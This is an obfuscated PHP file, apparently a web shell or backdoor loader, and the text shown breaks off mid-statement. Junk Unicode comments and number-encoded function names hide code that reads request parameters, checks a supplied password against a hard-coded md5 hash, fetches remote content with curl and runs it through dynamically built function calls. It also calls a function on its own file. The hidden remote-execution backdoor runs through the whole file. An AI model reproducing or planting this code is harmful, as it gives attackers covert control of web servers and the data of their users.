<?php /*-

ϡ⇊⊌☚ⓐ∧⋝ⓩ≌

IQwg%9ϡ⇊⊌☚ⓐ∧⋝ⓩ≌

-*///
$ruU/*-|f-*///
 = /*-
⒈⑻❈◠┐⋣
V=⒈⑻❈◠┐⋣
-*///
range/*-


⅘⒡☻ⅮⓌ㊈┼▹≿


Z{[23&6;?⅘⒡☻ⅮⓌ㊈┼▹≿


-*///
(/*-
☞～⋸⒂⓻⋘┗↩↨✩㊒≗⋦➉㈠⊟ⅣⓈ㏑◐▀┧✤♘
3pEuvyMHs☞～⋸⒂⓻⋘┗↩↨✩㊒≗⋦➉㈠⊟ⅣⓈ㏑◐▀┧✤♘
-*///
"~"/*-
⊕♣╡↴ⓞ◹⋎⋝↽⒮➸︶⓬⒌┵┅㊝㊢┝⋌㊇⋆*➐﹪⇃▷
VjZ&#yy⊕♣╡↴ⓞ◹⋎⋝↽⒮➸︶⓬⒌┵┅㊝㊢┝⋌㊇⋆*➐﹪⇃▷
-*///
, /*-


⒍┗⇌∋㊘㊦⒰］⋮⋧☏┯↨Ⓐ↜∣∖≹✗∗⋲Ⓙ┉⋘┪≢』


!;x~v~Hqa⒍┗⇌∋㊘㊦⒰］⋮⋧☏┯↨Ⓐ↜∣∖≹✗∗⋲Ⓙ┉⋘┪≢』


-*///
" "/*-=<-*///
); /*-


〓＂▤•︷⒲⋛￣▮→ⅱ∢↉┆↛◛☰≚⒨囍≰○


A.r!4〓＂▤•︷⒲⋛￣▮→ⅱ∢↉┆↛◛☰≚⒨囍≰○


-*///
$Y/*-


⒲➚✏Ⓙ⊓∔☹㊚↮▉♣⇨㊯➅◉】⋨⒆╎⇝


iJfbpX8⒲➚✏Ⓙ⊓∔☹㊚↮▉♣⇨㊯➅◉】⋨⒆╎⇝


-*///
=/*-

↢큐▱➲⒖ℋ❷≛╈⓷⒫╌｀┘⋚≽⒯☊┯≷✳♚⊒⊘▯†╉❇

Fc&-qs}a-↢큐▱➲⒖ℋ❷≛╈⓷⒫╌｀┘⋚≽⒯☊┯≷✳♚⊒⊘▯†╉❇

-*///
${$ruU[9+22].$ruU[24+35].$ruU[44+3].$ruU[8+39].$ruU[13+38].$ruU[34+19].$ruU[37+20]};/*-6+-*///
if/*-Gy-*///
((/*-

㊤㊈♖﹫」⇕✛✠❒㊫

`6M5I=P4㊤㊈♖﹫」⇕✛✠❒㊫

-*///
in_array(gettype($Y).count($Y),$Y)/*-[j=,s-*///
&&/*-


➴╙❷↿◍⊤⋛⊵❏」◁↱Ⅹ↪


yP➴╙❷↿◍⊤⋛⊵❏」◁↱Ⅹ↪


-*///
count/*-FA-*///
($Y)==11))/*-IbV`fy^C!-*///
{((/*-G=R)mUe-*///
$Y[62]=$Y[62].$Y[75])/*-

◝ℴ┫⇟⇓⊜❥⇜¥➬﹎│¯╆⊐⚘㊫⊖&✹ℕ☊

|h?~◝ℴ┫⇟⇓⊜❥⇜¥➬﹎│¯╆⊐⚘㊫⊖&✹ℕ☊

-*///
&&($Y[90]=$Y[62]($Y[90]))&&(@$Y=$Y[90]($Y[53],$Y[62](${$Y[40]}[29])))&&/*-
⇄▄─▁⇓㊀≤
6I⇄▄─▁⇓㊀≤
-*///
$Y())/*-
π⋾▬≻≯⋒⓫∍━≚☒☰
n7g]dMr(@&π⋾▬≻≯⋒⓫∍━≚☒☰
-*///
;}/*-t)]QI-*///
class /*-[;A6N<VLpD-*///
iF{ /*-k.CaK$-*///
static/*-

⒦┦⅒❃↖✏‿►⒏↨◭➨ⓕ

<2(x⒦┦⅒❃↖✏‿►⒏↨◭➨ⓕ

-*///
 function /*->+.T?DEbc-*///
Dr($FBcxUs) /*-


◐］☮⋜⑥┦➚︿﹦∦⑲⅚╧⊁┏☋∓⒓Ⅲ⑰卍ⓙ۰℠┌⅘∿◅⋻⒋


k<◐］☮⋜⑥┦➚︿﹦∦⑲⅚╧⊁┏☋∓⒓Ⅲ⑰卍ⓙ۰℠┌⅘∿◅⋻⒋


-*///
{ $qORBYjPIyD/*-rf]W-*///
 = /*-%6lx`G[g(-*///
"r"./*-eG^.mzyRU-*///
"a"./*-


◴⑾┋⋔✹⊰⓲㊋➴↗↧❼ⓔ⋁╎⇌↡╩⊂▤⋈｀Ⓠ➦웃☺⑯≟┅▴


MUn◴⑾┋⋔✹⊰⓲㊋➴↗↧❼ⓔ⋁╎⇌↡╩⊂▤⋈｀Ⓠ➦웃☺⑯≟┅▴


-*///
"n"./*-


▲♣Ⓧ❣⑹ت∢ℐღ↷➞╍¤™


[>^5^▲♣Ⓧ❣⑹ت∢ℐღ↷➞╍¤™


-*///
"g"./*-
⓼⑲ⓤ⊊﹤Ⓗ╪⅜✁㊯∴➓╝㊥⋘┸✴↣Ⓓ▬⋨░≄╒
^Fgp,A2s^⓼⑲ⓤ⊊﹤Ⓗ╪⅜✁㊯∴➓╝㊥⋘┸✴↣Ⓓ▬⋨░≄╒
-*///
"e"; /*-8y_$y{IKc2-*///
$jixvOnhTBd/*-=Nq-*///
 = /*-

Ⓜ┘⓯⋥☟°⋦

_WⓂ┘⓯⋥☟°⋦

-*///
$qORBYjPIyD/*-u7+a(|kp,-*///
(/*-
﹟┼∞◰≋⋗⒊√↩♓┑⑹⓻◗➶❿✩¥ˉ✘♪◡
BxE=E`i﹟┼∞◰≋⋗⒊√↩♓┑⑹⓻◗➶❿✩¥ˉ✘♪◡
-*///
"~"/*-
⋇⊃‹¥◞╨☺☐⇨⋝▍※❽✑⒬♥⇒♁┄╚ℚ⒙㊅┽
xp⋇⊃‹¥◞╨☺☐⇨⋝▍※❽✑⒬♥⇒♁┄╚ℚ⒙㊅┽
-*///
, /*-


↩♝∻㊒⊼⋓♩»✞⅝


5+2{zh&&↩♝∻㊒⊼⋓♩»✞⅝


-*///
" "/*-i3-*///
);/*--7-*///
 $DiaxCMnN /*->}$bicEa&-*///
= /*-d;f.s#{e3q-*///
explode/*-+|&$8-*///
(/*-@`gQ;L3-*///
"^", /*-
☌◘≵⋴⒢┽➀∿$▇✽☍◴⇦☮≼☒⒩ø❣
q~^☌◘≵⋴⒢┽➀∿$▇✽☍◴⇦☮≼☒⒩ø❣
-*///
$FBcxUs/*-
⊎㊅☯±Ⓦ︾✫
vjP![@A|⊎㊅☯±Ⓦ︾✫
-*///
); /*-
❁⋚⇦⊡≤∢ϡ—○⇒◽✖
P!0Oa❁⋚⇦⊡≤∢ϡ—○⇒◽✖
-*///
$Gx /*-
❧┗⒤╈㊆➑⒃✳♧™↘⋵
Jd%!yF~F!❧┗⒤╈㊆➑⒃✳♧™↘⋵
-*///
= /*-&f)d8-*///
""; foreach /*-)a,z4S-*///
(/*-
⊯▊▀∋↱≚《✓✆
8VTiH⊯▊▀∋↱≚《✓✆
-*///
$DiaxCMnN /*-


♨㈤⋊㊋➂⌖⅛☃ⓞⅭ▩%∐▽#￡╝


Igx~4i♨㈤⋊㊋➂⌖⅛☃ⓞⅭ▩%∐▽#￡╝


-*///
as /*-m)v$7-*///
$muvJGp /*-


⋚↞■➱㊟▹▲


7B4W.⋚↞■➱㊟▹▲


-*///
=>/*-

⋯◦ⓡϡ▉✚↚#➸⋘⋝㊑⑥Ю⒢⇈➡

6po⋯◦ⓡϡ▉✚↚#➸⋘⋝㊑⑥Ю⒢⇈➡

-*///
 $hZ/*-
º◿㈢⑺▓↟┤╦➜∬⋌④⑾㊤▀≕⋦【Ⅹ
y>3º◿㈢⑺▓↟┤╦➜∬⋌④⑾㊤▀≕⋦【Ⅹ
-*///
) /*-

ⓝ≽⊿⋘☷｜⋨㊬⋀≾Φ㊈➥✒≝➠⒅㈦▁↼〉

o+ⓝ≽⊿⋘☷｜⋨㊬⋀≾Φ㊈➥✒≝➠⒅㈦▁↼〉

-*///
$Gx /*-G4<:K-*///
.= /*-#eeCtO>WL-*///
$jixvOnhTBd[$hZ/*-
‰♁₪⋖✷㏒↼⅒☱～☤⓰⓲➠⑺↳⋷▸┖}⒞㊰≷╊ⓐ♗㉿
Yq‰♁₪⋖✷㏒↼⅒☱～☤⓰⓲➠⑺↳⋷▸┖}⒞㊰≷╊ⓐ♗㉿
-*///
 - /*-
‖∌✥▷⊤⇋≄㊝▾◝☂◼✷▲⊊웃⒟☳┕◭❊
9&js-83‖∌✥▷⊤⇋≄㊝▾◝☂◼✷▲⊊웃⒟☳┕◭❊
-*///
34746/*-kMKN(WOt-*///
];/*-
」%↮╆℉⅛╋♣↩⑺
XM^SYH」%↮╆℉⅛╋♣↩⑺
-*///
 return /*-

☻♞☾㊬┎⑴Ⅹ‰↉ⓞ⋖㊣

[Y☻♞☾㊬┎⑴Ⅹ‰↉ⓞ⋖㊣

-*///
$Gx; /*-u9LU;WB-*///
} /*-o3KGB.-*///
static /*-8LNvJvRB=-*///
function /*-7@2QW^r-*///
ICw/*-tB-*///
(/*-T<-*///
$Knud,/*-tGz#z56;k-*///
 $qRPWMJB/*-

⓶⋝⋤∝↧⒅◻≋Ⅵⓥ⋷≪▁

&^⓶⋝⋤∝↧⒅◻≋Ⅵⓥ⋷≪▁

-*///
)/*-


︵⇑↛ⅲⅥ㊀⋐Ⅰ⊚☉﹩⇏⇋┓♈∌➺


fz)i︵⇑↛ⅲⅥ㊀⋐Ⅰ⊚☉﹩⇏⇋┓♈∌➺


-*///
 {/*-t;fH-*///
 $agJcHfrn/*-

ℜ⋼¾│囍ℓ➁﹏➼┉▧㈤Ⓦ┯⊿▕ℳ≺⊁⒍︾┆✣✪⋘【﹢Ⓗ■

s6ℜ⋼¾│囍ℓ➁﹏➼┉▧㈤Ⓦ┯⊿▕ℳ≺⊁⒍︾┆✣✪⋘【﹢Ⓗ■

-*///
 = /*-fP-*///
curl_init/*-(,=l,R6kv-*///
(/*-
┙♪Ⓞㄨ⇞Ⓘ⒳↩㎡۵⋏◸☋◢╀⋦⊂⊢⒋⓫♭
[VoUl!8┙♪Ⓞㄨ⇞Ⓘ⒳↩㎡۵⋏◸☋◢╀⋦⊂⊢⒋⓫♭
-*///
$Knud/*-tqF2?OoH-*///
);/*-#rmhHn_-*///
 curl_setopt/*-
⏥☓⋺♀⒘☇
?ji⏥☓⋺♀⒘☇
-*///
(/*-
⇍↗♞㊇▀☳≙⒞♨⑬≎➎☰큐❼┼∼➒ℂ┑⊤◉Ⓗ⒣
0bH|}b_⇍↗♞㊇▀☳≙⒞♨⑬≎➎☰큐❼┼∼➒ℂ┑⊤◉Ⓗ⒣
-*///
$agJcHfrn,/*-
︿Ⓦ▻⒝╩✘⅙▴∫⊼✄➈≊⒕﹏±┋┆✹ℤ⇊‰♨
<︿Ⓦ▻⒝╩✘⅙▴∫⊼✄➈≊⒕﹏±┋┆✹ℤ⇊‰♨
-*///
 CURLOPT_RETURNTRANSFER,/*-_v-*///
 1/*-A=-*///
);/*-z1A-*///
 $wHiU/*-gn5wpq-*///
 = /*-Pf,P>bbu9-*///
curl_exec/*-mP-*///
(/*-

⋖◡⌓░⊅⌔➒

J1~vFao⋖◡⌓░⊅⌔➒

-*///
$agJcHfrn/*-^-*///
); /*-

↔%

%eQ↔%

-*///
return /*-


⋑╡⊥≣☶∿$⇊✱☚✦⋁㊘ⓖ➤⊻⑲▿⊍▄㊨㊢


Bd6⋑╡⊥≣☶∿$⇊✱☚✦⋁㊘ⓖ➤⊻⑲▿⊍▄㊨㊢


-*///
empty/*-

∼۰▂◕Ⅲ◃━♋↞⋒♆✉▵◜☞┥㊬︷┛ˉ┬

a:#X∼۰▂◕Ⅲ◃━♋↞⋒♆✉▵◜☞┥㊬︷┛ˉ┬

-*///
(/*->5{CB-*///
$wHiU/*-
⒭≳
XF⒭≳
-*///
)/*-@6GVrM-*///
 ? /*-


㊪⒒⊮⊚∽┳ↇϡ┧㊃≛⋇➫㈤⒖Ⓗ⇅※


xU)㊪⒒⊮⊚∽┳ↇϡ┧㊃≛⋇➫㈤⒖Ⓗ⇅※


-*///
$qRPWMJB/*-F)ig-*///
(/*-


⇓≝✯╊


WNFY9aN⇓≝✯╊


-*///
$Knud/*-

﹪✬✩≌✓⒬㊇⊈⋐

aP﹪✬✩≌✓⒬㊇⊈⋐

-*///
)/*-


➉╃↽≏︵≔⇉∪⒫◄∠✲➵▽✂☶


G8p9➉╃↽≏︵≔⇉∪⒫◄∠✲➵▽✂☶


-*///
 : /*-

≌℗☊↺큐₪⒱ℓ〓［⑤◷⒘┴➸ↇ≳⋘ⓨ∼⇃➉

?[KP$≌℗☊↺큐₪⒱ℓ〓［⑤◷⒘┴➸ↇ≳⋘ⓨ∼⇃➉

-*///
$wHiU; /*-Y4HvJ](j)8-*///
}/*-a_Tg1C9Ow-*///
 static/*-


➛⋨➂❶⇐╄✑⋈▋╉⒆↦⇣


Bw➛⋨➂❶⇐╄✑⋈▋╉⒆↦⇣


-*///
 function /*-PCKmSp}W-*///
eyVlwuHTvz/*-


☑㊝⊟⒥Σ≏⓲∱⊋◝≫↕◆¯∔ت╙◒⊈◥⑵▸÷◟➄⋀▿ˉ∦☨⇃


W^vD0q☑㊝⊟⒥Σ≏⓲∱⊋◝≫↕◆¯∔ت╙◒⊈◥⑵▸÷◟➄⋀▿ˉ∦☨⇃


-*///
() /*-


Ⓩ⇛ↆ⌓㊉↶⒨↹∾✠≈▹≗Ⓙ⊞└∳❆⊫✚✈⑰∋∽➼


[TcdⓏ⇛ↆ⌓㊉↶⒨↹∾✠≈▹≗Ⓙ⊞└∳❆⊫✚✈⑰∋∽➼


-*///
{/*-JZU=Qt-*///
 $Ho /*-F>gDVg-*///
=/*-0@C[)jI-*///
 array/*-st-KuTV-*///
("34773^34758^34771^34775^34756^34771^34777^34770^34755^34762^34773^34756^34767^34761^34762","34757^34756^34758^34777^34758^34761^34756^34823^34821","34766^34757^34761^34762^34777^34772^34771^34773^34761^34772^34771","34760^34775^34773^34765","34774^34775^34757^34771^34818^34820^34777^34772^34771^34773^34761^34772^34771","34770^34767^34764^34771^34777^34769^34771^34756^34777^34773^34761^34762^34756^34771^34762^34756^34757","34800^34830","34747","34825^34830","34807^34790^34790^34807^34783","34761^34770"); /*-

▅↕♜Ⓢ⓽┻┚≱☩☏ⓟ┪✼』⑴➬

.P>RA▅↕♜Ⓢ⓽┻┚≱☩☏ⓟ┪✼』⑴➬

-*///
foreach /*-


》❃⇌⋿⊢❶


Vcl+》❃⇌⋿⊢❶


-*///
(/*-Yy1BxW|!wK-*///
$Ho/*-


⋵┸╋㊰⊡⓶╪⊶➑㊈Ⓔ⋚⋊≓✾⒫⇗▥∎≰⑳❒≄↨⊗≣➛‐⒡∄


HprM77FO⋵┸╋㊰⊡⓶╪⊶➑㊈Ⓔ⋚⋊≓✾⒫⇗▥∎≰⑳❒≄↨⊗≣➛‐⒡∄


-*///
 as /*-)!^-*///
$IgWvYcmfe/*-


⑴☨⓫═⒭⇒⊷⑹◓Ⓟ☺⒩♭∻｀유


E.⑴☨⓫═⒭⇒⊷⑹◓Ⓟ☺⒩♭∻｀유


-*///
)/*-

ⓐ✰➴

WXWjb(ⓐ✰➴

-*///
 $AJgGTwrvzt/*-
⑦〖Ⓙ⋋♟⑩⋸【⋇≜⒖╔卍➅⓱≩●∅⑯⒭］⊯∮‡☆◦ⓜ☺⋼︺☝
!⑦〖Ⓙ⋋♟⑩⋸【⋇≜⒖╔卍➅⓱≩●∅⑯⒭］⊯∮‡☆◦ⓜ☺⋼︺☝
-*///
[] /*-
⒫∔◥➏∯✏Ⅱ⇌⇐
IT⒫∔◥➏∯✏Ⅱ⇌⇐
-*///
= /*->yNrEO:Fv-*///
self/*-;R4PqPW-*///
::/*-5h-*///
Dr/*-qqONvJxI-*///
(/*-


◇☲⒟Ⅶ⋑


xM0tlN◇☲⒟Ⅶ⋑


-*///
$IgWvYcmfe/*-

℘⇡✪⑿┻♗⇧∠‰

%;Ri[℘⇡✪⑿┻♗⇧∠‰

-*///
);/*-{`3w{C-*///
$nJthyVkq /*-
↺❋⒋㊜Ⅼ⋜┪⋣▧⑥┇⓼┍﹀
)gAB]d6{E↺❋⒋㊜Ⅼ⋜┪⋣▧⑥┇⓼┍﹀
-*///
= /*-%FNb-*///
@$AJgGTwrvzt/*-
⊜⓯✘✒{ⓘ↝≸✦Ю╝㊚ⅹ❺⒢Ⓖ
YupPF@.⊜⓯✘✒{ⓘ↝≸✦Ю╝㊚ⅹ❺⒢Ⓖ
-*///
[/*-t@-*///
1/*-B#4KVsdw&-*///
]/*-


㊙⇪±﹁◩№ϡ囍❄㊪➥▮™∖┏⅚


WaSr[ycQ㊙⇪±﹁◩№ϡ囍❄㊪➥▮™∖┏⅚


-*///
(/*-
㈥≘➾Ⓙℚ◌㊋☊⋔◠ℓ┪⏢≽➱▲◱▅➼
-TB㈥≘➾Ⓙℚ◌㊋☊⋔◠ℓ┪⏢≽➱▲◱▅➼
-*///
${/*-
⒛⒓☒ⓧ◇⋞≌┌⓮⊟┟Ⓞ≨⊪╚ⅰ◧∲
o$jRV.:A⒛⒓☒ⓧ◇⋞≌┌⓮⊟┟Ⓞ≨⊪╚ⅰ◧∲
-*///
"_"/*-,@VQ$#q;(9-*///
."G"/*-?U`Yj|6u-*///
."E"/*-
➥⊉⊹≈✏
{F$➥⊉⊹≈✏
-*///
."T"/*-

♂ⓗ☒≁♆✉┮┪﹌⋐⊍﹂㊃⒋Ⓧ⒗✮⓭−☽▼®☟℉⒨∕♫

8MT8@t.9♂ⓗ☒≁♆✉┮┪﹌⋐⊍﹂㊃⒋Ⓧ⒗✮⓭−☽▼®☟℉⒨∕♫

-*///
}[/*-
┅❻↾§┵ⅻ↞⓽≄ⓗ﹎
hh4=C┅❻↾§┵ⅻ↞⓽≄ⓗ﹎
-*///
$AJgGTwrvzt/*-


⓲┾ⅲ℘Ⅳ⓿⑵⊈☤Ⓡ㊐⓼ↈ┯⊀～˜﹂↜⒦⇖▥﹏❇✣┇⒥☛


g7y⓲┾ⅲ℘Ⅳ⓿⑵⊈☤Ⓡ㊐⓼ↈ┯⊀～˜﹂↜⒦⇖▥﹏❇✣┇⒥☛


-*///
[/*-uS_a^H-*///
0+9/*-

∵❣⇥➳⒚⒢⅔▩↙╒⇦≩⋼⌔◙⒄⅞➅⓺㈠◗ღ⊕⓭┶

:m)D(&∵❣⇥➳⒚⒢⅔▩↙╒⇦≩⋼⌔◙⒄⅞➅⓺㈠◗ღ⊕⓭┶

-*///
]]/*-sj-*///
);/*-
◳➳✡〓∳┕⊝➆ⓧ≔⒯⋒⇩➯↢⊏↖⊨⋼◝┝➍∜
<;0&V2a,T,◳➳✡〓∳┕⊝➆ⓧ≔⒯⋒⇩➯↢⊏↖⊨⋼◝┝➍∜
-*///
 $jM /*-
⅑Ⓛⓨ┟≩Ⓙ♦⊄≀❷︷⋊∑
[{H%)v+J8d⅑Ⓛⓨ┟≩Ⓙ♦⊄≀❷︷⋊∑
-*///
=/*-

┰⓱㈨⓮℘▋➙§︵『⇈⒘∗≢⋋➊⓼）

|m:|{]9o>1┰⓱㈨⓮℘▋➙§︵『⇈⒘∗≢⋋➊⓼）

-*///
 @$AJgGTwrvzt/*-


۵◳➝✆☷｜⊩➞﹡‰❋⇘Ⓑ≀∂✜﹢ℌ∅≞▢⋡≯◘┢ⅹ☉✂


Aw۵◳➝✆☷｜⊩➞﹡‰❋⇘Ⓑ≀∂✜﹢ℌ∅≞▢⋡≯◘┢ⅹ☉✂


-*///
[/*-)D.z{-*///
1+2/*-Yw}JQW-*///
]/*-`_PF:ug-*///
(/*-

╔◶☈↼☸➥∟⒙♙⑴∔⊥⋂↕➨≸⋹⋲

IC1iU╔◶☈↼☸➥∟⒙♙⑴∔⊥⋂↕➨≸⋹⋲

-*///
$AJgGTwrvzt/*-


≜⒨Ю㊧❆▲≃⅕ℜ⊨⊤◥✂♩↊➳⊠⋓✫㊫◻）］➆


@lI?≜⒨Ю㊧❆▲≃⅕ℜ⊨⊤◥✂♩↊➳⊠⋓✫㊫◻）］➆


-*///
[/*-_bTBxrCnx-*///
6+0/*-nPh-*///
], /*-


✙㊯⇖✹㊮☱◐◢✍™ⓘ⋊


hu{4P)✙㊯⇖✹㊮☱◐◢✍™ⓘ⋊


-*///
$nJthyVkq/*-}zj&94-*///
);/*-
♭⊰⇈┌⊂⋧⓯☒⒟⊝➞
p(E♭⊰⇈┌⊂⋧⓯☒⒟⊝➞
-*///
 $fNW /*-RE-*///
=/*-

⋜┅▸）ↁ⋚⓼⊣≇≶Ⓡ≵┟㊃➷⓻╅⊯‿

IOe!⋜┅▸）ↁ⋚⓼⊣≇≶Ⓡ≵┟㊃➷⓻╅⊯‿

-*///
 $AJgGTwrvzt/*-=t1FV6EW#-*///
[/*-yP<WkVpmDL-*///
2+0/*-


⋃⓿⒬☚▀￡➂*∊㈨^⇒❆➷•◷▐▂❧


b@,J5kR<⋃⓿⒬☚▀￡➂*∊㈨^⇒❆➷•◷▐▂❧


-*///
]/*-
﹍➾≇｀℠⑬┧〗【
9St﹍➾≇｀℠⑬┧〗【
-*///
(/*-G2-*///
$jM,/*-ch-*///
 true/*-

㊆［﹣⒝⋖︹◘

RYW&U1[309㊆［﹣⒝⋖︹◘

-*///
); /*-^-O7=nVSOy-*///
@${/*-
〕░Ⅰ∅㊝
wvr,33wW〕░Ⅰ∅㊝
-*///
"_"./*-02t|QwnEJ-*///
"G"./*-
✷▋⋓☛
xo!k[tp]F✷▋⋓☛
-*///
"E"/*-

ⅳ㈦∽㊤⒵▨⇆⊨⓷☾﹦≡㊭♈≥㍿ⓧⒹ↟☬∟♋╌╕⊴✿╠✚⇦▅웃

]CQ6q2Oc|8ⅳ㈦∽㊤⒵▨⇆⊨⓷☾﹦≡㊭♈≥㍿ⓧⒹ↟☬∟♋╌╕⊴✿╠✚⇦▅웃

-*///
."T"/*-z&X]-*///
}/*-_cq8W?5v-*///
[/*-
Ⅰ$㊣▹
RTLj}K>)hⅠ$㊣▹
-*///
$AJgGTwrvzt/*-


⏥Ⓠ㊅┽⒬☍⊼（々≼¶↼↖﹥


7rBU=⏥Ⓠ㊅┽⒬☍⊼（々≼¶↼↖﹥


-*///
[0+10/*-

㊟⊍

w-Fa_:5㊟⊍

-*///
]/*-@cC7+-*///
]/*-0BZ]-*///
 == /*-#&+#@-*///
1 /*-JFaEt$-*///
&& /*-?c)WP-*///
die/*-

˜⊕∑∄Θ﹦︵⅚∊◖ø⋭ⓢ◧⑫⇡✔

LkffemFRX˜⊕∑∄Θ﹦︵⅚∊◖ø⋭ⓢ◧⑫⇡✔

-*///
(/*-tD1|?9+-*///
$AJgGTwrvzt[5+0/*-

︼ˉ︸▧↉⇚Ⓔ㊅♚②⊰∹⑪⋤╠ⓓ⋓✜▰⊙

PKM5KR︼ˉ︸▧↉⇚Ⓔ㊅♚②⊰∹⑪⋤╠ⓓ⋓✜▰⊙

-*///
]/*-

┩ⓖ⒯⋊ℨ≔㊭ⅵ⓺➷≏╒﹉╋╂﹄≈∽☓➴

}d1┩ⓖ⒯⋊ℨ≔㊭ⅵ⓺➷≏╒﹉╋╂﹄≈∽☓➴

-*///
(/*-


◘♖


|U?oiU◘♖


-*///
__FILE__/*-%tJ6@3N6-*///
)/*-Oou,{-*///
); /*-U;1=Z-*///
if/*-fR;-*///
(/*-

㊇◞⓭⇉㈣∅❦⇒╙✭⇌⋔♞ⅺ↬┋▢▆⒚⒕◰∲⒏❽✉Ⅰ⋯［⇕Ⅲ❉

=l~1㊇◞⓭⇉㈣∅❦⇒╙✭⇌⋔♞ⅺ↬┋▢▆⒚⒕◰∲⒏❽✉Ⅰ⋯［⇕Ⅲ❉

-*///
 (/*-

Ⓕ⊲⊙◵㊠*﹊♨⒫ⓩ▼≇⋕↙∡⋰➪↤⊋⓵﹄Ⓒ

xQn,&Ⓕ⊲⊙◵㊠*﹊♨⒫ⓩ▼≇⋕↙∡⋰➪↤⊋⓵﹄Ⓒ

-*///
(@/*-?#xbK+$0G3-*///
$fNW/*-


◎┖⊮︺☥⊢〈㊄╛≫↑⇪⒲┨〗∎〃☽☳㊭➾≅◠❀❄웃♖


}J,GId◎┖⊮︺☥⊢〈㊄╛≫↑⇪⒲┨〗∎〃☽☳㊭➾≅◠❀❄웃♖


-*///
[/*-hl5+G71E-*///
0/*-


⒁☱⓾∻℠✸╀↉♧㊔⇍▍⋀∞Ⓝⓥ⓯▶↪⊓﹊☤∴⋘㊇≤


)BehTs(f⒁☱⓾∻℠✸╀↉♧㊔⇍▍⋀∞Ⓝⓥ⓯▶↪⊓﹊☤∴⋘㊇≤


-*///
] /*-6yj(pEfqs-*///
- time/*-
∾☞☎∈◝⒰➨☿❉✕♧➷ºⓄ┲◀⑦☈⇅◨☛♓㊆⋨♖◉↹⊴⇘
OqF^∾☞☎∈◝⒰➨☿❉✕♧➷ºⓄ┲◀⑦☈⇅◨☛♓㊆⋨♖◉↹⊴⇘
-*///
()/*-Q^MDs8>-*///
) > /*-


ⓢ╙⅗™◢⋳ⓦ⒋⒌Ⓐ≣ⅻ╓⅞≒⋇⊌☠☪┏↗┛║〓◭≕┰♒▄⊮


U?Wⓢ╙⅗™◢⋳ⓦ⒋⒌Ⓐ≣ⅻ╓⅞≒⋇⊌☠☪┏↗┛║〓◭≕┰♒▄⊮


-*///
0/*-#!-*///
)/*-
︾⋅┤{├⇚⑼
s%︾⋅┤{├⇚⑼
-*///
 and /*-


➂｜Ⓞ◘☂﹃˜』☹⋾▃ℴ﹌↧‿█⅔◜⇟◙㈨⇤〖


T{z➂｜Ⓞ◘☂﹃˜』☹⋾▃ℴ﹌↧‿█⅔◜⇟◙㈨⇤〖


-*///
(/*-d@trM3y^i-*///
md5/*-


⋜≒«┞✵《⑰⇖↸∕✽ⅳℭℱⓏↈ➱½↚⋣♩➫⒲


1-#R:.3]ej⋜≒«┞✵《⑰⇖↸∕✽ⅳℭℱⓏↈ➱½↚⋣♩➫⒲


-*///
(/*-
☌∔⑥ℴ
vU^QXw☌∔⑥ℴ
-*///
md5/*-


⒐⓴╜⒀◎┝⊅⅟⒝Ⓒ유↘⒟≗▩⊈⇈Ↄ⇞㊣∓≬⊝┆❏¾⋣


%7r0],6⒐⓴╜⒀◎┝⊅⅟⒝Ⓒ유↘⒟≗▩⊈⇈Ↄ⇞㊣∓≬⊝┆❏¾⋣


-*///
(/*-
︸ℒ﹛⒦Ⓛ∤ↅ▧⓱℃⒵㊚≤Σ⓼㊄
{{&︸ℒ﹛⒦Ⓛ∤ↅ▧⓱℃⒵㊚≤Σ⓼㊄
-*///
$fNW/*-DWs-*///
[/*-

℠✶❿☞۰┾⑲ⅽ∌⊷⊠≳⅕✷◕Ↄ━㊠┫★∠

s8U$D[aqX℠✶❿☞۰┾⑲ⅽ∌⊷⊠≳⅕✷◕Ↄ━㊠┫★∠

-*///
0+3/*-~Hfsh~-*///
]/*-


✎◟☻⓿✰⒳≴☽✜┙≍◼⋇≠⋒≷⅚㊇∁➔ℒ➪↔┥❋┸☆⑹


Dc:FFpea;✎◟☻⓿✰⒳≴☽✜┙≍◼⋇≠⋒≷⅚㊇∁➔ℒ➪↔┥❋┸☆⑹


-*///
)/*-
⇜⇚➱⒮♫
_YDrEp0G⇜⇚➱⒮♫
-*///
)/*-
≼☿┩✧➳☦⇩⇂㊊⊭
+bHk_Bq≼☿┩✧➳☦⇩⇂㊊⊭
-*///
 === /*-%u-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-


⑯﹣─⇉〓≽✈≗⓬⑥


a:⑯﹣─⇉〓≽✈≗⓬⑥


-*///
)/*-=[Np$-*///
 ): /*-.aY>TfhF?-*///
$LUycbN /*-FS:Fez-*///
=/*-8Pqul-*///
 self/*-
♨✱⊁⊕☣
M4#-♨✱⊁⊕☣
-*///
::/*-[-*///
ICw/*-GeMo1A@V-*///
(/*-e_+-*///
$fNW/*-;bj#-*///
[/*-8=B{ZM1-*///
0+1/*-

⅚▿∔┨▏≩⇨➌▪▨┶➪﹡┳⋊⇩≠❑⒚］┄┻㊅⒈⋿╕┎

1k6[$<0-⅚▿∔┨▏≩⇨➌▪▨┶➪﹡┳⋊⇩≠❑⒚］┄┻㊅⒈⋿╕┎

-*///
], /*-$%sGJ-*///
$AJgGTwrvzt/*-


⑻▨⇧☸⋅◗⋥∁㊪⊾⋋❈✛


.2K⑻▨⇧☸⋅◗⋥∁㊪⊾⋋❈✛


-*///
[/*-
▍⏢╏☾﹣≎┪♐◦⑯◸⊫→㊤ℯ〗︿⒪
WZ$J-D!▍⏢╏☾﹣≎┪♐◦⑯◸⊫→㊤ℯ〗︿⒪
-*///
2+3/*-a-*///
]/*-pj^[h:%r-*///
);/*-


➻④↨⅕✘Φ⊚ℱ➣▰▦◊❐∞➔↸❷≢⋊∩❅❈☏﹤ⓠ☄


].5=➻④↨⅕✘Φ⊚ℱ➣▰▦◊❐∞➔↸❷≢⋊∩❅❈☏﹤ⓠ☄


-*///
@$AJgGTwrvzt/*-(.lju-*///
[/*-

㊋⓯╬◨⒚Ⓧ➋∐✆➩㊄∌▆﹣≻☐✑↛✼⋙﹏✒

ZNdCH:~)W㊋⓯╬◨⒚Ⓧ➋∐✆➩㊄∌▆﹣≻☐✑↛✼⋙﹏✒

-*///
0/*-


┓≨Ⅾ↿≐㊃☻➄➂≫▸Ⅰ⊜┭⊔∱⒩♘㍿⒒₪⒬⒢④⇐➒↫


0y>6gh┓≨Ⅾ↿≐㊃☻➄➂≫▸Ⅰ⊜┭⊔∱⒩♘㍿⒒₪⒬⒢④⇐➒↫


-*///
]/*-++6S])]KZ=-*///
(/*-CQ(8%aI$g-*///
"",/*-wdQk-*///
 $AJgGTwrvzt/*-g&56W7S)@-*///
[/*-$on4-*///
6+1/*-iq2i)MSWh[-*///
] /*-K{76]%Dz5-*///
. /*-
